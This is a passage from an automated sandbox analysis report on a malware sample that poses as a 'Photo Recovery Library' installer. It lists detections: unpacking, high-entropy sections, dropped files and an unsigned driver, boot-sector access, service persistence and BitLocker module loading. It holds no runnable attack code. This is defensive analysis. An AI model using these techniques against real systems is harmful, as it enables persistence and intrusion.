            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeSection loaded: sqlite3.dll
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeSection loaded: winmm.dll
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeSection loaded: mpr.dll
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeSection loaded: wininet.dll
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeSection loaded: appxsip.dll
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeSection loaded: opcservices.dll
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeSection loaded: ntmarta.dll
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeSection loaded: dhcpcsvc.dll
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeSection loaded: iertutil.dll
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeSection loaded: winhttp.dll
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeSection loaded: mswsock.dll
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeSection loaded: winnsi.dll
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeSection loaded: urlmon.dll
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeSection loaded: srvcli.dll
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeSection loaded: netutils.dll
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeSection loaded: schannel.dll
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeSection loaded: mskeyprotect.dll
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeSection loaded: ntasn1.dll
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeSection loaded: msasn1.dll
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeSection loaded: dpapi.dll
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeSection loaded: gpapi.dll
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeSection loaded: ncrypt.dll
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeSection loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\12321321.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpWindow found: window name: TMainFormJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Photo Recovery Library_is1Jump to behavior

            Data Obfuscation

            barindex
            Detected unpacking (changes PE section rights)
            Source: C:\Users\user\Desktop\12321321.exeUnpacked PE file: 0.2.12321321.exe.400000.0.unpack "YR:EW;b.bbb:EW;Unknown_Section2:W; vs "YR:ER;b.bbb:ER;Unknown_Section2:W;
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeUnpacked PE file: 10.2.photorecoverylib.exe.400000.0.unpack .text:EW;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeUnpacked PE file: 10.2.photorecoverylib.exe.400000.0.unpack
            Source: C:\Users\user\Desktop\12321321.exeCode function: 0_2_00402890 LoadLibraryA,GetProcAddress,GetCurrentThread,FreeLibrary,0_2_00402890
            Source: initial sampleStatic PE information: section where entry point is pointing to: b.bbb
            Source: 12321321.exeStatic PE information: section name: "YR
            Source: 12321321.exeStatic PE information: section name: b.bbb
            Source: 12321321.exeStatic PE information: section name: bbS
            Source: Hmas5kDc_8664.sys.2.drStatic PE information: section name: css0
            Source: is-7OE1I.tmp.8.drStatic PE information: section name: /4
            Source: is-7OE1I.tmp.8.drStatic PE information: section name: /19
            Source: is-7OE1I.tmp.8.drStatic PE information: section name: /35
            Source: is-7OE1I.tmp.8.drStatic PE information: section name: /51
            Source: is-7OE1I.tmp.8.drStatic PE information: section name: /63
            Source: is-7OE1I.tmp.8.drStatic PE information: section name: /77
            Source: is-7OE1I.tmp.8.drStatic PE information: section name: /89
            Source: is-7OE1I.tmp.8.drStatic PE information: section name: /102
            Source: is-7OE1I.tmp.8.drStatic PE information: section name: /113
            Source: is-7OE1I.tmp.8.drStatic PE information: section name: /124
            Source: sqlite3.dll.10.drStatic PE information: section name: /4
            Source: sqlite3.dll.10.drStatic PE information: section name: /19
            Source: sqlite3.dll.10.drStatic PE information: section name: /35
            Source: sqlite3.dll.10.drStatic PE information: section name: /51
            Source: sqlite3.dll.10.drStatic PE information: section name: /63
            Source: sqlite3.dll.10.drStatic PE information: section name: /77
            Source: sqlite3.dll.10.drStatic PE information: section name: /89
            Source: sqlite3.dll.10.drStatic PE information: section name: /102
            Source: sqlite3.dll.10.drStatic PE information: section name: /113
            Source: sqlite3.dll.10.drStatic PE information: section name: /124
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeCode function: 1_2_00007FF7C7B54802 push eax; ret 1_2_00007FF7C7B54811
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF7C7A3D2A5 pushad ; iretd 3_2_00007FF7C7A3D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF7C7C22316 push 8B485F94h; iretd 3_2_00007FF7C7C2231B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF7C7A5D2A5 pushad ; iretd 5_2_00007FF7C7A5D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF7C7B719DC pushad ; ret 5_2_00007FF7C7B719E9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF7C7C42316 push 8B485F92h; iretd 5_2_00007FF7C7C4231B
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\1609a74d-2a2b-4f95-9570-07a864ac654e.exeCode function: 7_2_004065C8 push 00406605h; ret 7_2_004065FD
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\1609a74d-2a2b-4f95-9570-07a864ac654e.exeCode function: 7_2_004040B5 push eax; ret 7_2_004040F1
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\1609a74d-2a2b-4f95-9570-07a864ac654e.exeCode function: 7_2_00408104 push ecx; mov dword ptr [esp], eax7_2_00408109
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\1609a74d-2a2b-4f95-9570-07a864ac654e.exeCode function: 7_2_00404185 push 00404391h; ret 7_2_00404389
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\1609a74d-2a2b-4f95-9570-07a864ac654e.exeCode function: 7_2_00404206 push 00404391h; ret 7_2_00404389
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\1609a74d-2a2b-4f95-9570-07a864ac654e.exeCode function: 7_2_0040C218 push eax; ret 7_2_0040C219
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\1609a74d-2a2b-4f95-9570-07a864ac654e.exeCode function: 7_2_004042E8 push 00404391h; ret 7_2_00404389
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\1609a74d-2a2b-4f95-9570-07a864ac654e.exeCode function: 7_2_00404283 push 00404391h; ret 7_2_00404389
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\1609a74d-2a2b-4f95-9570-07a864ac654e.exeCode function: 7_2_00408F38 push 00408F6Bh; ret 7_2_00408F63
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_004849F4 push 00484B02h; ret 8_2_00484AFA
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_0040995C push 00409999h; ret 8_2_00409991
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_00458060 push 00458098h; ret 8_2_00458090
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_004860E4 push ecx; mov dword ptr [esp], ecx8_2_004860E9
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_004062C4 push ecx; mov dword ptr [esp], eax8_2_004062C5
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_004783C8 push ecx; mov dword ptr [esp], edx8_2_004783C9
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_004104F0 push ecx; mov dword ptr [esp], edx8_2_004104F5
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_00412938 push 0041299Bh; ret 8_2_00412993
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_0049AD44 pushad ; retf 8_2_0049AD53
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_0040CE48 push ecx; mov dword ptr [esp], edx8_2_0040CE4A
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_00459378 push 004593BCh; ret 8_2_004593B4
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_0040F3A8 push ecx; mov dword ptr [esp], edx8_2_0040F3AA
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_0040546D push eax; ret 8_2_004054A9
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_004434B4 push ecx; mov dword ptr [esp], ecx8_2_004434B8
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_0040553D push 00405749h; ret 8_2_00405741
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_004055BE push 00405749h; ret 8_2_00405741
            Source: 12321321.exeStatic PE information: section name: b.bbb entropy: 7.9262045404820025
            Source: Hmas5kDc_8664.sys.2.drStatic PE information: section name: .text entropy: 7.166404761662683
            Source: is-PG511.tmp.8.drStatic PE information: section name: .text entropy: 6.90903234258047

            Persistence and Installation Behavior

            barindex
            Contains functionality to infect the boot sector
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive010_2_02DCE8B2
            Sample is not signed and drops a device driver
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeFile created: C:\Windows\Temp\Hmas5kDc_8664.sysJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\is-GR71V.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\libGLESv2.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\is-AD2UI.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\libEGL.dll (copy)Jump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeFile created: C:\Windows\Temp\Hmas5kDc_8664.sysJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\1609a74d-2a2b-4f95-9570-07a864ac654e.exeFile created: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\is-MS967.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\is-HOEOG.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\uninstall\is-DH20J.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpFile created: C:\Users\user\AppData\Local\Temp\is-B3MMC.tmp\_isetup\_setup64.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeFile created: C:\ProgramData\PhotoRecoveryLib\sqlite3.dllJump to dropped file
            Source: C:\Users\user\Desktop\12321321.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\001[1].exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\sqlite3.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\is-VMOUV.tmpJump to dropped file
            Source: C:\Users\user\Desktop\12321321.exeFile created: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\is-7OE1I.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\msvcr100.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeFile created: C:\Users\user\AppData\Local\Temp\d.ghSlh.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpFile created: C:\Users\user\AppData\Local\Temp\is-B3MMC.tmp\_isetup\_shfoldr.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeFile created: C:\ProgramData\PhotoRecoveryLib\PhotoRecoveryLib.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\uninstall\unins000.exe (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpFile created: C:\Users\user\AppData\Local\Temp\is-B3MMC.tmp\_isetup\_iscrypt.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\msvcp100.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\Qt5Concurrent.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\is-PG511.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\Qt5PrintSupport.dll (copy)Jump to dropped file
            Source: C:\Users\user\Desktop\12321321.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\silk[1].exeJump to dropped file
            Source: C:\Users\user\Desktop\12321321.exeFile created: C:\Users\user\AppData\Local\Temp\GuardFox\1609a74d-2a2b-4f95-9570-07a864ac654e.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\icuuc51.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\is-MLBF0.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\is-6EQIQ.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpFile created: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\icuin51.dll (copy)Jump to dropped file
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeFile created: C:\ProgramData\PhotoRecoveryLib\PhotoRecoveryLib.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeFile created: C:\ProgramData\PhotoRecoveryLib\sqlite3.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeFile created: C:\Windows\Temp\Hmas5kDc_8664.sysJump to dropped file

            Boot Survival

            barindex
            Contains functionality to infect the boot sector
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive010_2_02DCE8B2
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Sgnk28N_8664Jump to behavior
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.7\photorecoverylib.exeCode function: 10_2_0040DCE3 StartServiceCtrlDispatcherA,10_2_0040DCE3

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,8_2_00423C1C
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_00423C1C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,8_2_00423C1C
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_004241EC IsIconic,SetActiveWindow,SetFocus,8_2_004241EC
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_004241A4 IsIconic,SetActiveWindow,8_2_004241A4
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_00418394 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,8_2_00418394
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_004843A8 IsIconic,GetWindowLongA,ShowWindow,ShowWindow,8_2_004843A8
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_0042286C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,8_2_0042286C
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_0042F2F0 IsIconic,GetWindowLongA,GetWindowLongA,GetActiveWindow,MessageBoxA,SetActiveWindow,GetActiveWindow,MessageBoxA,SetActiveWindow,8_2_0042F2F0
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_004175A8 IsIconic,GetCapture,8_2_004175A8
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_00417CDE IsIconic,SetWindowPos,8_2_00417CDE
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_00417CE0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,8_2_00417CE0
            Source: C:\Users\user\AppData\Local\Temp\is-6SVL9.tmp\1609a74d-2a2b-4f95-9570-07a864ac654e.tmpCode function: 8_2_0041F128 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,8_2_0041F128
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\c9f74e53-58d1-13d2-8abb-0195719b8be2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
